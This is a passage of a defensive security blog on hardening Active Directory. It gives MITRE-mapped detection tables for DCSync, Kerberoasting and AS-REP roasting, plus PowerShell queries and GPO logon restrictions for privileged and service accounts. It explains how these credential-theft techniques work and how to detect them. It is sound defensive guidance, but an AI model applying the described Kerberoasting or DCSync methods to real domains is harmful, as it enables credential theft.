#000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Interactive or Remote Logon of a Highly Privileged Account to an Unauthorized System</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for logon attempts correlating to highly privileged accounts authenticating to systems that reside outside of the Tier 0 layer.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Privileged Account and Group Discovery</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1069/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1069 – Permission Groups Discovery</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for command-line events where a user is attempting to enumerate privileged accounts and groups.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Account Added to Highly Privileged Group</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> <p><a href="https://attack.mitre.org/techniques/T1098/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1098 – Account Manipulation</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Identify when accounts are added to highly privileged groups. While this can occur as part of normal activity, it should be infrequent and limited to specific accounts.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Modification of Group Policy Objects</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1484/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1484.001 – Domain Policy Modification: Group Policy Modification</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Identify when GPOs are created or modified.</span></p> <p><span style="vertical-align: baseline;">GPOs can also be exported and reviewed to identify last modification timestamps.<br/><br/></span></p> <pre class="language-plain"><code>get-gpo -all | export-csv -path "c:\temp\gpo-listing-all.csv" -NoTypeInformation</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 30: PowerShell cmdlet to export and review GPO creation and modification timestamps</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DCSync Attack</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1003/006/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1003.006 - OS Credential Dumping</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor for non-domain-controller sources issuing directory replication requests (</span><span style="font-style: italic; vertical-align: baseline;">DS-Replication-Get-Changes</span><span style="vertical-align: baseline;"> and </span><span style="font-style: italic; vertical-align: baseline;">DS-Replication-Get-Changes-All</span><span style="vertical-align: baseline;">). </span></p> <p><span style="vertical-align: baseline;">Event ID 4662 with properties matching the replication GUIDs (</span><span style="font-style: italic; vertical-align: baseline;">1131f6aa-*, 1131f6ad-*</span><span style="vertical-align: baseline;">) from non-domain-controller source addresses is a high-fidelity indicator of DCSync.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 20: Detection opportunities for privileged accounts, groups, and GPO modifications</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Privileged and Service Account Protections</span></h4> <h5><span style="vertical-align: baseline;">Identify and Review Noncomputer Accounts Configured with an SPN</span></h5> <p><span style="vertical-align: baseline;">Accounts with service principal names (SPNs) are commonly targeted by threat actors for privilege escalation. Using Kerberos, any domain user can request a Kerberos service ticket (TGS) from a domain controller for any account configured with an SPN. Noncomputer accounts likely are configured with guessable (nonrandom) passwords. Regardless of the domain function level or the host's Windows version, SPNs that are registered under a noncomputer account will use the legacy RC4-HMAC encryption suite rather than Advanced Encryption Standard (AES). The key used for encryption and decryption of the RC4-HMAC encryption type represents an unsalted NTLM hash version of the account's password, which could be derived via cracking the ticket.</span></p> <p><span style="vertical-align: baseline;">Organizations should review Active Directory to identify noncomputer accounts configured with an SPN. Noncomputer accounts correlated to registered SPNs are likely service accounts and provide a method for a threat actor (without administrative privileges) to potentially derive (crack) the plain-text password for the account (Kerberoasting). To identify noncomputer accounts configured with an SPN, the PowerShell cmdlet referenced in Figure 31 can be run from a domain controller.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Get-ADUser -Filter {(ServicePrincipalName -like "*")} | Select-Object name,samaccountname,sid,enabled,DistinguishedName</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 31: PowerShell cmdlet to identify noncomputer accounts configured with an SPN</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Where possible, organizations should deregister noncomputer accounts with SPNs configured. Where SPNs are needed, organizations should mitigate the risk associated with Kerberoasting attacks. Accounts with SPNs should be configured with strong, unique passwords (e.g., minimum 25+ characters) with the passwords rotated on a periodic basis for the accounts. Furthermore, privileges should be reviewed and reduced for these accounts to ensure that each account has the minimum required privileges needed for the intended function.</span></p> <p><span style="vertical-align: baseline;">Accounts with SPNs should be considered in-scope for the proactive hardening measures detailed throughout this blog post.</span></p> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">SPNs should never be associated with regular interactive user accounts.</span></p> <h4><span style="vertical-align: baseline;">Detection Opportunities for Noncomputer Accounts Configured with an SPN</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Potential Kerberoasting Attempt Using RC4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1558/003/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Searching for a Kerberos request using downgraded RC4 encryption.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AS-REP Roasting</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1558/004/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1558.004 - Steal or Forge Kerberos Tickets</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Monitor Event ID 4768 for Kerberos authentication requests using RC4 encryption (0x17) for accounts with the "</span><span style="font-style: italic; vertical-align: baseline;">Do not require Kerberos preauthentication</span><span style="vertical-align: baseline;">" flag set. Unlike Kerberoasting (which targets SPNs), AS-REP Roasting targets accounts with disabled preauthentication (which should be reviewed and mitigated).</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; margin-top: 8px; width: 100%; font-style: italic;">Table 21: Detection opportunities for noncomputer accounts configured with an SPN</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Privileged Account Logon Restrictions</span></h4> <p><span style="vertical-align: baseline;">Privileged and service account credentials are commonly used for lateral movement and establishing persistence.</span></p> <p><span style="vertical-align: baseline;">For any accounts that have privileged access throughout an environment, the accounts should not be used on standard workstations and laptops, but rather from designated systems (e.g., privileged access workstations [PAWs]) that reside in restricted and protected VLANs and tiers. Dedicated privileged accounts should be defined for each tier, with controls that enforce that the accounts can only be used within the designated tier. Guardrail enforcement for privileged accounts can be defined within GPOs or by using authentication policy silos (Windows Server 2012 R2 domain-functional level or above).</span></p> <p><span style="vertical-align: baseline;">The recommendations for restricting the scope of access for privileged accounts are based upon Microsoft's guidance for securing privileged access. For additional information, reference:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/authentication-policies-and-authentication-policy-silos" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/authentication-policies-and-authentication-policy-silos</span></a></p> </li> </ul> <h5><span style="vertical-align: baseline;">User Rights Assignments</span></h5> <p><span style="vertical-align: baseline;">As a proactive hardening or quick containment measure, consider blocking any accounts with privileged AD access from being able to log in (remotely or locally) to standard workstations, laptops, and common access servers (e.g., virtualized desktop infrastructure).</span></p> <p><span style="vertical-align: baseline;">The settings referenced as follows are configurable using user rights assignments defined within GPOs via the path of: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Accounts delegated with domain-based privileged access should be explicitly denied access to standard workstations and laptop systems within the context of the following settings (which can be configured using GPO settings similar to what are depicted in Figure 32):</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deny access to this computer from the network (also include</span><strong style="vertical-align: baseline;"> </strong><code style="vertical-align: baseline;">S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code><span style="vertical-align: baseline;">) (</span><code style="vertical-align: baseline;">SeDenyNetworkLogonRight</code><span style="vertical-align: baseline;">)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deny logon as a batch job (</span><code style="vertical-align: baseline;">SeDenyBatchLogonRight</code><span style="vertical-align: baseline;">)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deny logon as a service (</span><code style="vertical-align: baseline;">SeDenyServiceLogonRight</code><span style="vertical-align: baseline;">)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deny logon locally (</span><code style="vertical-align: baseline;">SeDenyInteractiveLogonRight</code><span style="vertical-align: baseline;">)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deny logon through Terminal Services (</span><code style="vertical-align: baseline;">SeDenyRemoteInteractiveLogonRight</code><span style="vertical-align: baseline;">)</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig32.max-1000x1000.png" alt="Example of Privileged Account Access Restrictions for a Standard Workstation Using GPO Settings"> </a> <figcaption class="article-image__caption "><p data-block-key="l6xux">Figure 32: Example of privileged account access restrictions for a standard workstation using GPO settings</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Additionally, using GPOs, permissions can be restricted on endpoints to protect against privilege escalation and potential data theft by reducing the scope of accounts that have the following user rights assignments:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Debug programs (</span><code style="vertical-align: baseline;">SeDebugPrivilege</code><span style="vertical-align: baseline;">) </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Back up files and directories (</span><code style="vertical-align: baseline;">SeBackupPrivilege</code><span style="vertical-align: baseline;">) </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Restore files and directories (</span><code style="vertical-align: baseline;">SeRestorePrivilege</code><span style="vertical-align: baseline;">) </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Take ownership of files or other objects (</span><code style="vertical-align: baseline;">SeTakeOwnershipPrivilege</code><span style="vertical-align: baseline;">)</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Detection Opportunities for Privileged Account Logons</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Attempted Logon of a Privileged Account from a Nonprivileged Access Workstation</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078 – Valid Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for logon attempts correlating to highly privileged accounts authenticating to systems that reside outside of the Tier 0 layer.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 22: Detection opportunities for privileged account logons</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Service Account Logon Restrictions</span></h4> <p><span style="vertical-align: baseline;">Organizations should also consider enhancing the security of domain-based service accounts to restrict the capability for the accounts to be used for interactive, remote desktop, and, where possible, network-based logons. </span></p> <p><strong><span style="vertical-align: baseline;">Minimum recommended logon hardening for service accounts (on endpoints where the service account is not required for interactive or remote logon purposes):</span></strong></p> <ul> <li><span style="vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span> <ul> <li>Deny logon locally (<code>SeDenyInteractiveLogonRight</code>)</li> <li>Deny logon through Terminal Services (<code>SeDenyRemoteInteractiveLogonRight</code>)</li> </ul> </li> </ul> <p><strong><span style="vertical-align: baseline;">Additional recommended logon hardening for service accounts (on endpoints where the service accounts is not required for network-based logon purposes):</span></strong></p> <ul> <li><span style="vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span> <ul> <li><span style="vertical-align: baseline;">Deny access to this computer from the network (<code>SeDenyNetworkLogonRight</code>)</span></li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">If a service account is only required to be leveraged on a single endpoint to run a specific service, the service account can be further restricted to only permit the account's usage on a predefined listing of endpoints (Figure 33).</span></p> <ul> <li><span style="vertical-align: baseline;">Active Directory Users and Computers &gt; Select the account</span> <ul> <li><span style="vertical-align: baseline;">Account tab</span> <ul> <li><span style="vertical-align: baseline;">Log On To button &gt; Select the proper scope of computers for access</span></li> </ul> </li> </ul> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/destructive-attacks-guidance-fig33.max-1000x1000.png" alt="Option to Restrict an Account to Log onto Specific Endpoints"> </a> <figcaption class="article-image__caption "><p data-block-key="i2oc9">Figure 33: Option to restrict an account to log onto specific endpoints</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Detection Opportunities for Service Account Logons</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 